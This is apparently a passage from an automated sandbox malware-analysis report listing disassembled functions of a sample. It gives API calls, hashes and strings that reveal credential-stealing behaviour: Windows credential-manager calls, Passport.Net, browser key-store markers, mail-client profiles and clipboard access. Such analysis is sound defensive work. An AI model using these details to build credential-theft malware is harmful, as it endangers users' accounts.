                                                                                                                                                                                    • String ID: BINARY$NOCASE$RTRIM$main$temp
                                                                                                                                                                                    • API String ID: 1784268899-4153596280
                                                                                                                                                                                    • Opcode ID: ad1bb3be98cb8143327a8bba99d80b2cd1d250b2812bf04c93ad8184def5b6bb
                                                                                                                                                                                    • Instruction ID: 8c81c6e629260c6e32056db5335e0b2518b1498a844935eff1e92b421965135b
                                                                                                                                                                                    • Opcode Fuzzy Hash: ad1bb3be98cb8143327a8bba99d80b2cd1d250b2812bf04c93ad8184def5b6bb
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8391F3B1A007009FE730EF25C981B5FBBE4AB44304F50492FF4569B392D7B9E9458B99
                                                                                                                                                                                    Function 004101AF Relevance: 9.1, APIs: 6, Instructions: 143COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,0040FE66,00000000,?), ref: 004101E6
                                                                                                                                                                                    • memset.MSVCRT ref: 00410246
                                                                                                                                                                                    • memset.MSVCRT ref: 00410258
                                                                                                                                                                                      • Part of subcall function 004100CC: _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                                                                                                                    • memset.MSVCRT ref: 0041033F
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,?,00000000,00000118), ref: 00410364
                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 004103AE
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3974772901-0
                                                                                                                                                                                    • Opcode ID: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                                                                                                                                                                    • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                                                                                                                                                                                    • Opcode Fuzzy Hash: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                                                                                                                                                                    • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                                                                                                                                                                                    Function 00444059 Relevance: 9.1, APIs: 6, Instructions: 96stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • wcslen.MSVCRT ref: 0044406C
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 00444075
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                                                                                                      • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433A0
                                                                                                                                                                                      • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433BE
                                                                                                                                                                                      • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433D9
                                                                                                                                                                                      • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443402
                                                                                                                                                                                      • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443426
                                                                                                                                                                                    • strlen.MSVCRT ref: 004440D1
                                                                                                                                                                                      • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT(?,?,004440DF), ref: 00443507
                                                                                                                                                                                      • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT ref: 00443516
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 577244452-0
                                                                                                                                                                                    • Opcode ID: b68bf44ff0a216cc051a87f20d5bcca37ca8fef9720e645d8a392b89cae1757c
                                                                                                                                                                                    • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                                                                                                                                                                                    • Opcode Fuzzy Hash: b68bf44ff0a216cc051a87f20d5bcca37ca8fef9720e645d8a392b89cae1757c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                                                                                                                                                                                    Function 00404487 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 75COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                      • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 00404518
                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 00404536
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _strcmpi$memcpystrlen
                                                                                                                                                                                    • String ID: imap$pop3$smtp
                                                                                                                                                                                    • API String ID: 2025310588-821077329
                                                                                                                                                                                    • Opcode ID: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                                                                                                                                                                    • Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
                                                                                                                                                                                    • Opcode Fuzzy Hash: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88
                                                                                                                                                                                    Function 0040C00D Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 72COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040C02D
                                                                                                                                                                                      • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                                                                                                                                      • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
                                                                                                                                                                                      • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
                                                                                                                                                                                      • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                                                                                                      • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                                                                                                                                                                      • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                                                                                                                                                                      • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                                                                                                                                                                      • Part of subcall function 004076B7: memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                                                                                                                      • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                                                                                                                                                                      • Part of subcall function 004076B7: memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                                                                                                                                      • Part of subcall function 004074EA: _mbscpy.MSVCRT(?,?), ref: 00407550
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                                                                                                                                                    • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                                                                                    • API String ID: 2726666094-3614832568
                                                                                                                                                                                    • Opcode ID: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                                                                                                                                                    • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                                                                                                                                                    • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                                                                                                                                                                                    Function 00403A61 Relevance: 9.1, APIs: 6, Instructions: 57filestringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00403A88
                                                                                                                                                                                    • memset.MSVCRT ref: 00403AA1
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF), ref: 00403AB8
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403AD7
                                                                                                                                                                                    • strlen.MSVCRT ref: 00403AE9
                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403AFA
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharMultiWidememset$FileWritestrlen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1786725549-0
                                                                                                                                                                                    • Opcode ID: 89e9c396a026bbeb42c60f6c6870dce76feb575119cfb40fcdc12e2b9f15660d
                                                                                                                                                                                    • Instruction ID: 75a67b34ad05bb499385cce9778aa698b1b4849105f4284936cacb9952f60aa3
                                                                                                                                                                                    • Opcode Fuzzy Hash: 89e9c396a026bbeb42c60f6c6870dce76feb575119cfb40fcdc12e2b9f15660d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 291121B680112CBEFB119BA4DCC5EEB73ADDF09355F0005A6B715D2092E6349F448B78
                                                                                                                                                                                    Function 0040C143 Relevance: 9.1, APIs: 6, Instructions: 54fileclipboardCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                                                                                                                                                                    • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                                                                                                                                                                    • OpenClipboard.USER32(?), ref: 0040C1B1
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0040C1CA
                                                                                                                                                                                    • DeleteFileA.KERNEL32(00000000), ref: 0040C1E7
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2014771361-0
                                                                                                                                                                                    • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                                                                                                                    • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                                                                                                                    • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                                                                                                                                                                                    Function 0040613B Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 51COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memcmp.MSVCRT ref: 00406151
                                                                                                                                                                                      • Part of subcall function 0040607F: memcmp.MSVCRT ref: 0040609D
                                                                                                                                                                                      • Part of subcall function 0040607F: memcpy.MSVCRT(00000268,0000001A,?,00000000), ref: 004060CC
                                                                                                                                                                                      • Part of subcall function 0040607F: memcpy.MSVCRT(-00000368,0000001F,00000060,00000268,0000001A,?,00000000), ref: 004060E1
                                                                                                                                                                                    • memcmp.MSVCRT ref: 0040617C
                                                                                                                                                                                    • memcmp.MSVCRT ref: 004061A4
                                                                                                                                                                                    • memcpy.MSVCRT(0000013F,00000000,00000000), ref: 004061C1
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcmp$memcpy
                                                                                                                                                                                    • String ID: global-salt$password-check
                                                                                                                                                                                    • API String ID: 231171946-3927197501
                                                                                                                                                                                    • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                                                                                                                    • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                                                                                                                                                                                    • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                                                                                                                    • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                                                                                                                                                                                    Function 00443473 Relevance: 9.0, APIs: 6, Instructions: 46COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,0044418F,004441FB,?,00000000), ref: 00443481
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 0044349C
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434B2
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434C8
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434DE
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434F4
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??3@
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 613200358-0
                                                                                                                                                                                    • Opcode ID: 729e63cf5715f59118fe9d1a7c2076f24b1191d02e23bde904ada99bcc76db32
                                                                                                                                                                                    • Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
                                                                                                                                                                                    • Opcode Fuzzy Hash: 729e63cf5715f59118fe9d1a7c2076f24b1191d02e23bde904ada99bcc76db32
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
                                                                                                                                                                                    Function 00401694 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 004016A3
                                                                                                                                                                                    • GetSystemMetrics.USER32(00000015), ref: 004016B1
                                                                                                                                                                                    • GetSystemMetrics.USER32(00000014), ref: 004016BD
                                                                                                                                                                                    • BeginPaint.USER32(?,?), ref: 004016D7
                                                                                                                                                                                    • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E6
                                                                                                                                                                                    • EndPaint.USER32(?,?), ref: 004016F3
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 19018683-0
                                                                                                                                                                                    • Opcode ID: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                                                                                                                                                    • Instruction ID: cf01e476fd02228c824cf2568a7310e823bc3a91870265851f050ef0b1242b16
                                                                                                                                                                                    • Opcode Fuzzy Hash: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                                                                                                                                                    • Instruction Fuzzy Hash: 81012C76900218AFDF44DFE4DC849EE7B79FB45301F040569EA11AA1A4DAB0A904CB50
                                                                                                                                                                                    Function 004063B2 Relevance: 8.9, APIs: 7, Instructions: 157COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040644F
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                                                                                                                      • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                                                                                                                                                                                      • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                                                                                                                                                                                      • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                                                                                                                                                                                      • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                                                                                                                                      • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,00000060,?,?,?,00000040,00406667,?,?,?), ref: 004064B9
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000060,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004064CC
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,?,?,?,?,?,?,?,?,?), ref: 004064F9
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000014,?,?,?,?,?,?,?,?,?), ref: 0040650E
                                                                                                                                                                                      • Part of subcall function 00406286: memcpy.MSVCRT(?,?,00000008,?,?,?,?,?), ref: 004062B2
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy$memset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 438689982-0
                                                                                                                                                                                    • Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                                                                                                                    • Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
                                                                                                                                                                                    • Opcode Fuzzy Hash: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                                                                                                                    • Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5
                                                                                                                                                                                    Function 0044493E Relevance: 8.9, APIs: 7, Instructions: 147stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0044495F
                                                                                                                                                                                    • memset.MSVCRT ref: 00444978
                                                                                                                                                                                    • memset.MSVCRT ref: 0044498C
                                                                                                                                                                                      • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                                                                                                                                    • strlen.MSVCRT ref: 004449A8
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 004449CD
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000008,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 004449E3
                                                                                                                                                                                      • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                                                                                                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                                                                                                                                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                                                                                                                                      • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                                                                                                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000008,?,?,?,?,00000008,?,00000000,00000000), ref: 00444A23
                                                                                                                                                                                      • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                                                                                                      • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                                                                                                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpymemset$strlen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2142929671-0
                                                                                                                                                                                    • Opcode ID: db1fe4889964b4b4561ff1fa413a374de4b2b8250443d72fdef4f343b664ad1c
                                                                                                                                                                                    • Instruction ID: aa4dc9b89352709bd4c521be83aedc2b1fb2a96970f66ede65b30d7c79a4835d
                                                                                                                                                                                    • Opcode Fuzzy Hash: db1fe4889964b4b4561ff1fa413a374de4b2b8250443d72fdef4f343b664ad1c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 96513B7290015DAFDB10EF95CC81AEEB7B8FB44308F5445AAE509A7141EB34EA898F94
                                                                                                                                                                                    Function 0040F6E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 97stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                                                                                                                      • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll), ref: 004045E8
                                                                                                                                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA,00000000,?,00000000), ref: 00404601
                                                                                                                                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree,?,00000000), ref: 0040460D
                                                                                                                                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA,?,00000000), ref: 00404619
                                                                                                                                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA,?,00000000), ref: 00404625
                                                                                                                                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW,?,00000000), ref: 00404631
                                                                                                                                                                                      • Part of subcall function 00404734: LoadLibraryA.KERNEL32(?), ref: 0040473C
                                                                                                                                                                                      • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?,?,00000000), ref: 00404754
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F7AE
                                                                                                                                                                                    • strlen.MSVCRT ref: 0040F7BE
                                                                                                                                                                                    • _mbscpy.MSVCRT(00000000,?,?,00000000), ref: 0040F7CF
                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F7DC
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProc$LibraryLoad_mbscpy$ByteCharFreeLocalMultiWidestrlen
                                                                                                                                                                                    • String ID: Passport.Net\*
                                                                                                                                                                                    • API String ID: 2329438634-3671122194
                                                                                                                                                                                    • Opcode ID: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                                                                                                                                                                                    • Instruction ID: cbd5109d0b46f6ae46d16b49076c688dceaf9cc559dd015bf255ce3d8649dee3
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                                                                                                                                                                                    • Instruction Fuzzy Hash: 98316F76900109ABDB10EFA6DD45DAEB7B9EF89300F10007BE605F7291DB389A04CB59
                                                                                                                                                                                    Function 004032B7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                                                                                                                                                                                    • memset.MSVCRT ref: 0040330B
                                                                                                                                                                                    • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                                                                                                                                                                                    • strchr.MSVCRT ref: 0040335A
                                                                                                                                                                                      • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                                                                                                                                                                                    • strlen.MSVCRT ref: 0040339C
                                                                                                                                                                                      • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                                                                                                                                                    • String ID: Personalities
                                                                                                                                                                                    • API String ID: 2103853322-4287407858
                                                                                                                                                                                    • Opcode ID: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                                                                                                                                                                    • Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
                                                                                                                                                                                    • Opcode Fuzzy Hash: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
                                                                                                                                                                                    Function 00444551 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 51registryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
